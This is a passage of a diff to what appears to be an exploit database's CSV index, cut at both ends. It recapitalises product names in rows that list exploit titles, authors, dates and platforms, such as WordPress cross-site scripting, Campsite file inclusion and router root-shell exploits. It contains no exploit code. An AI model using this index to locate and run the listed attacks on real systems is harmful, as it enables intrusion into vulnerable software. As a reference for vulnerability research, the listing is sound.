Kundrak",linux,dos,0 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 -29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 +29522,platforms/php/webapps/29522.py,"Wordpress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 29523,platforms/osx/dos/29523.txt,"Apple 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 -29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery File Upload",2013-11-10,DevilScreaM,php,webapps,0 +29525,platforms/php/webapps/29525.txt,"Wordpress Highlight Premium Theme - Cross-Site Request Forgery File Upload",2013-11-10,DevilScreaM,php,webapps,0 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - .M3U Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_Mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 @@ -26578,12 +26578,12 @@ id,file,description,date,author,platform,type,port 29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - Main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0 -29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - Post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 +29682,platforms/php/webapps/29682.txt,"Wordpress 2.1.1 - Post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0 -29684,platforms/php/webapps/29684.txt,"WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 +29684,platforms/php/webapps/29684.txt,"Wordpress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 - Logfile HTML Injection",2007-02-27,SaMuschie,windows,remote,0 29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader 7.0.9 - Information Disclosure",2007-02-28,pdp,windows,remote,0 -29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure",2007-02-28,PeTrO,windows,remote,0 +29687,platforms/windows/remote/29687.py,"HyperBook GuestBook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure",2007-02-28,PeTrO,windows,remote,0 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",php,webapps,0 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0 36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection",2015-04-22,"TUNISIAN CYBER",php,webapps,80 @@ -26592,11 +26592,11 @@ id,file,description,date,author,platform,type,port 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0 29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps,0 29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload - Arbitrary File Upload",2013-11-25,Metasploit,windows,remote,8020 -29551,platforms/osx/dos/29551.txt,"Apple Mac OS X 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 +29551,platforms/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS - SQL Injection",2013-11-13,Metasploit,windows,remote,402 -29553,platforms/osx/dos/29553.txt,"Apple Mac OS X 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 -29554,platforms/osx/dos/29554.txt,"Apple Mac OS X 10.4.x - iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 -29555,platforms/osx/dos/29555.txt,"Apple Mac OS X 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 +29553,platforms/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 +29554,platforms/osx/dos/29554.txt,"Apple Mac OSX 10.4.x - iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 +29555,platforms/osx/dos/29555.txt,"Apple Mac OSX 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion",2007-01-31,trzindan,php,webapps,0 29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 - Login_Frame.php Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0 29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 - CMDMon.SYS Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0 @@ -26639,7 +26639,7 @@ id,file,description,date,author,platform,type,port 29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 - P Parameter Directory Traversal",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 - Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server - SearchResults.aspx Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps,0 -29598,platforms/php/webapps/29598.txt,"WordPress 1.x/2.0.x - Templates.php Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps,0 +29598,platforms/php/webapps/29598.txt,"Wordpress 1.x/2.0.x - Templates.php Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps,0 29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - Error.php Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps,0 29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 @@ -26662,7 +26662,7 @@ id,file,description,date,author,platform,type,port 29617,platforms/windows/dos/29617.pl,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)",2007-02-19,"Parveen Vashishtha",windows,dos,0 29618,platforms/windows/dos/29618.c,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)",2007-02-19,Marsu,windows,dos,0 29619,platforms/windows/remote/29619.html,"Microsoft Internet Explorer 6.0 - Local File Access",2007-02-20,"Rajesh Sethumadhavan",windows,remote,0 -29620,platforms/osx/dos/29620.txt,"Apple Mac OS X 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 +29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 29621,platforms/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,php,webapps,0 29622,platforms/asp/webapps/29622.txt,"Design4Online - Userpages2 Page.asp SQL Injection",2007-02-20,xoron,asp,webapps,0 29623,platforms/cgi/webapps/29623.txt,"Google Desktop - Cross-Site Scripting",2007-02-21,"Yair Amit",cgi,webapps,0 @@ -26684,8 +26684,8 @@ id,file,description,date,author,platform,type,port 29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 - 'index.php' id Parameter Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0 29640,platforms/php/webapps/29640.txt,"Shop Kit Plus - StyleCSS.php Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 - 'index.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 -29642,platforms/php/webapps/29642.txt,"Simple one-file gallery - gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 -29643,platforms/php/webapps/29643.txt,"Simple one-file gallery - gallery.php f Parameter Cross-Site Scripting",2007-02-23,"laurent gaffie",php,webapps,0 +29642,platforms/php/webapps/29642.txt,"Simple one-file Gallery - gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 +29643,platforms/php/webapps/29643.txt,"Simple one-file Gallery - gallery.php f Parameter Cross-Site Scripting",2007-02-23,"laurent gaffie",php,webapps,0 29644,platforms/php/webapps/29644.txt,"Pickle 0.3 - Download.php Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0 29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 - ShowCode.php Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0 29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 - data/flatevents.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 @@ -26708,10 +26708,10 @@ id,file,description,date,author,platform,type,port 29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service (Denial of Service)",2007-02-26,"Tom Ferris",windows,dos,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps,0 29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI - close_window.cgi Buffer Overflow",2013-11-18,Metasploit,hardware,remote,80 -29667,platforms/php/webapps/29667.txt,"WordPress Euclid Theme 1.x.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29668,platforms/php/webapps/29668.txt,"WordPress Dimension Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29669,platforms/php/webapps/29669.txt,"WordPress Amplus Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29670,platforms/php/webapps/29670.txt,"WordPress Make A Statement (MaS) Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 +29667,platforms/php/webapps/29667.txt,"Wordpress Euclid Theme 1.x.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 +29668,platforms/php/webapps/29668.txt,"Wordpress Dimension Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 +29669,platforms/php/webapps/29669.txt,"Wordpress Amplus Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 +29670,platforms/php/webapps/29670.txt,"Wordpress Make A Statement (MaS) Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 - admin/membersearch.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0 30188,platforms/windows/dos/30188.txt,"Apple Safari - Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",windows,dos,0 @@ -26737,8 +26737,8 @@ id,file,description,date,author,platform,type,port 29698,platforms/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - rating.php nid Parameter Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 29699,platforms/novell/remote/29699.txt,"Novell Access Management SSLVPN Server - Security Bypass",2007-03-02,anonymous,novell,remote,0 29700,platforms/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps,0 -29701,platforms/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - wp-includes/theme.php iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29701,platforms/php/webapps/29701.txt,"Wordpress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29702,platforms/php/webapps/29702.txt,"Wordpress 2.1.1 - wp-includes/theme.php iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection",2007-02-26,CorryL,php,webapps,0 29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - Login.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - Register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 @@ -26790,7 +26790,7 @@ id,file,description,date,author,platform,type,port 29751,platforms/php/webapps/29751.php,"PHPStats 0.1.9 - PHP-Stats-Options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 29752,platforms/php/remote/29752.php,"PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation",2007-03-19,"Stefan Esser",php,remote,0 29753,platforms/linux/remote/29753.c,"File(1) 4.13 - Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 -29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 +29754,platforms/php/webapps/29754.html,"Wordpress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 @@ -26803,7 +26803,7 @@ id,file,description,date,author,platform,type,port 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 - profile.php showuser Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 29765,platforms/php/webapps/29765.txt,"W-Agora 4.2.1 - search.php search_user Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 29766,platforms/php/webapps/29766.txt,"W-Agora 4.2.1 - change_password.php userid Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 -29767,platforms/hardware/dos/29767.txt,"ZyXEL Router 3.40 Zynos - SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",hardware,dos,0 +29767,platforms/hardware/dos/29767.txt,"ZYXEL Router 3.40 Zynos - SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",hardware,dos,0 29768,platforms/linux/remote/29768.txt,"Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29769,platforms/linux/remote/29769.txt,"Opera 9.x - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29770,platforms/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 @@ -26824,7 +26824,7 @@ id,file,description,date,author,platform,type,port 29787,platforms/windows/dos/29787.py,"HP Jetdirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,windows,dos,0 29788,platforms/php/remote/29788.php,"PHP 4.4.4 - Zip_Entry_Read() Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow",2014-01-07,Mr.XHat,windows,local,0 -30105,platforms/php/webapps/30105.txt,"WordPress Download Manager Free & Pro 2.5.8 Plugin - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 +30105,platforms/php/webapps/30105.txt,"Wordpress Download Manager Free & Pro 2.5.8 Plugin - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 - dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 - wantedpages.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 @@ -26864,7 +26864,7 @@ id,file,description,date,author,platform,type,port 30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow",2007-06-04,"KaiJern Lau",linux,remote,0 30143,platforms/php/webapps/30143.txt,"WebStudio CMS - 'index.php' Cross-Site Scripting",2007-06-04,"Glafkos Charalambous ",php,webapps,0 30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 - eSellerateControl365.dll ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote,0 -30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent",2013-12-08,Vulnerability-Lab,ios,webapps,0 +30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent Exploit",2013-12-08,Vulnerability-Lab,ios,webapps,0 30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 30152,platforms/php/webapps/30152.txt,"My Databook - diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0 30153,platforms/php/webapps/30153.txt,"My Databook - diary.php year Parameter Cross-Site Scripting",2007-06-04,Serapis.net,php,webapps,0 @@ -26876,7 +26876,7 @@ id,file,description,date,author,platform,type,port 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow",2007-06-08,"Dennis Rand",multiple,dos,0 30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - Tk Parameter Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote,0 30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - Okul Portal Haber_Oku.asp SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 -30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - Request_URI Parameter Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 +30166,platforms/php/webapps/30166.txt,"Wordpress 2.2 - Request_URI Parameter Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x - Web Interface Remote Denial of Service",2007-06-08,nnposter,hardware,dos,0 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - vBSupport.php SQL Injection",2007-06-09,rUnViRuS,php,webapps,0 30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,windows,remote,0 @@ -26884,7 +26884,7 @@ id,file,description,date,author,platform,type,port 30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - auth.php user Parameter Cross-Site Scripting",2007-06-11,"Tim Brown",php,webapps,0 30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 - admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 - admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 -30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 - BB-Login.php Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 +30175,platforms/php/webapps/30175.txt,"bbPress 0.8.1 - BB-Login.php Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows - Protocol Handler Command Injection",2007-06-12,"Thor Larholm",windows,remote,0 30177,platforms/php/webapps/30177.txt,"PlaySms 0.9.9.2 - Cross-Site Request Forgery",2013-12-10,"Saadi Siddiqui",php,webapps,0 30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart - comersus_message.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 @@ -26929,13 +26929,13 @@ id,file,description,date,author,platform,type,port 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 -29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Remote File Upload",2013-11-26,link_satisi,php,webapps,0 +29834,platforms/php/webapps/29834.txt,"Wordpress dzs-videogallery Plugins - Remote File Upload",2013-11-26,link_satisi,php,webapps,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - DSKernel2.dll ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - /ecrire/trackback.php post_id Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.dll ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 -29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - Admin/Index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 +29841,platforms/php/webapps/29841.txt,"phpFaber TopSites 3 - Admin/Index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29843,platforms/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 @@ -27034,7 +27034,7 @@ id,file,description,date,author,platform,type,port 29943,platforms/windows/dos/29943.c,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",windows,dos,0 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 -29946,platforms/php/webapps/29946.txt,"WordPress Orange Themes - Cross-Site Request Forgery (File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 +29946,platforms/php/webapps/29946.txt,"Wordpress Orange Themes - Cross-Site Request Forgery (File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - Content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin - Arama.asp Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf - OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 @@ -27054,7 +27054,7 @@ id,file,description,date,author,platform,type,port 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.pl Cross-Site Scripting",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - 'index.php' Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps,0 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - SpntSvc.exe Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 -29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - Picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 +29965,platforms/php/webapps/29965.txt,"Advanced GuestBook 2.4.2 - Picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - Article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 - ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -27087,7 +27087,7 @@ id,file,description,date,author,platform,type,port 29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 - User.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 - UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30000,platforms/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,ios,webapps,0 -30002,platforms/php/webapps/30002.txt,"WordPress Formcraft Plugin - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 +30002,platforms/php/webapps/30002.txt,"Wordpress Formcraft Plugin - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -27100,7 +27100,7 @@ id,file,description,date,author,platform,type,port 30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - (profile.php password0 parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - (index.php language parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 -30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 +30063,platforms/php/webapps/30063.txt,"Wordpress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - HLStats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 30065,platforms/php/webapps/30065.html,"GaliX 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injections",2007-05-21,"Jesper Jurcenoks",php,webapps,0 @@ -27121,14 +27121,14 @@ id,file,description,date,author,platform,type,port 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - News.asp Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0 30082,platforms/php/webapps/30082.txt,"GNUTurk - Mods.php Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - (mod_notification) Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 -30084,platforms/php/webapps/30084.php,"WordPress page-flip-image-gallery 